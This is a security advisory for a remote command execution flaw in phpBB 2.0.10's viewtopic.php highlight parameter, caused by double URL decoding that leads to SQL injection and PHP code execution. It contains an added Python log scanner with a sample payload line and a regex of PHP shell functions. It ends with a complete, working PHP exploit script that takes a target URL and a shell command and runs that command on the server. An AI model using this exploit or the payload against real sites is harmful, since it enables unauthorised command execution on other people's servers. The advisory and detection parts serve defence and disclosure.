phpBB Remote Command Execution (Viewtopic.php Highlight)


phpBB is "a high powered, fully scalable, and highly customizable Open Source bulletin board package". Inadequate UTF-8 character escaping causes an arbitrary command execution vulnerability in phpBB.


The information has been provided by jessica soules.
Exploit code by pokleyzz.


Vulnerable Systems:
 * phpBB version 2.0.10 and prior
 * The issue may affect PNphpbb and other products based on phpBB.

Immune Systems:
 * phpBB Version 2.0.11

Because of the way urldecode() and magic quotes interact, %2527 is first decoded to %27 and then to a literal single quote, after the slash-escaping step has already run, so the quote arrives unslashed. This gives you a SQL Injection, leading to an arbitrary PHP execution hole.


Will result in the following error message:
Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>POST TEXT HERE<') in viewtopic.php on line 1109
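As an added detection example (not part of the advisory), the following Python scans web-server access logs for viewtopic.php requests whose highlight parameter still carries a second layer of URL encoding after the server's own decode, or that decodes to a string-break followed by a PHP call. The log lines are constructed for the demo.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format log lines (not from the advisory); the second
# line carries the double-encoded highlight payload shape described above, with the
# command "id" spelled out as chr() calls.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Nov/2004:04:04:00 +0800] "GET /phpBB2/viewtopic.php?t=1&highlight=phpbb HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.9 - - [15/Nov/2004:04:05:10 +0800] "GET /phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.1" 200 211 "-" "PHP"
10.0.0.7 - - [15/Nov/2004:04:06:00 +0800] "GET /phpBB2/index.php HTTP/1.1" 200 9000 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# After the second decode: a quote closing the string, a concatenation dot, a PHP call.
INJECTION_RE = re.compile(r"'\s*\.\s*(?:system|exec|passthru|shell_exec|eval)\s*\(", re.I)
ENCODED_RE = re.compile(r"%[0-9A-Fa-f]{2}")

def inspect_highlight(line):
    """Return a finding dict for a viewtopic.php request whose highlight value
    looks double-encoded or decodes to injected PHP, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if not url.path.endswith("/viewtopic.php"):
        return None
    # parse_qs performs the first decode, as the web server/PHP would (%2527 -> %27)
    for once in parse_qs(url.query, keep_blank_values=True).get("highlight", []):
        signals = []
        if ENCODED_RE.search(once):
            signals.append("double_encoded")   # a second %XX layer survived decode #1
        twice = unquote(once)                  # the extra urldecode() phpBB applied itself
        if INJECTION_RE.search(twice):
            signals.append("code_injection")
        if signals:
            return {"ip": line.split()[0], "decoded": twice, "signals": signals}
    return None

def scan_log(text):
    """Run inspect_highlight over every line and return the list of findings."""
    return [f for f in map(inspect_highlight, text.splitlines()) if f]
```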

Vendor Status:
The issue has been fixed in phpBB version 2.0.11 and newer.

Temporary fix:
A temporary fix can be found at: http://www.phpbb.com/phpBB/viewtopic.php?t=240513

Exploit Code:
#!/usr/bin/php -q
<?php
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
# Requirement:
# PHP 4.x with curl extension;
# ** Selamat Hari Raya **

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if (isset($argv[2])) {
    $url = $argv[1];
    $command = $argv[2];
} else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpBB site (ex:\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex:\n";
    exit;
}

if (isset($argv[3]))
    $topic = $argv[3];
else
    $topic = 1;

$proxy = '';
if (isset($argv[4]))
    $proxy = $argv[4];

# the command is spelled as chr() calls joined by %252e (a double-encoded '.')
$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch = curl_init();
if ($proxy) {
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_URL, $url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
echo $res;

function str2chr($str) {
    $chr = '';
    for ($i = 0; $i < strlen($str); $i++) {
        $chr .= 'chr('.ord($str[$i]).')';
        if ($i != strlen($str) - 1)
            $chr .= '%252e';
    }
    return $chr;
}
?>
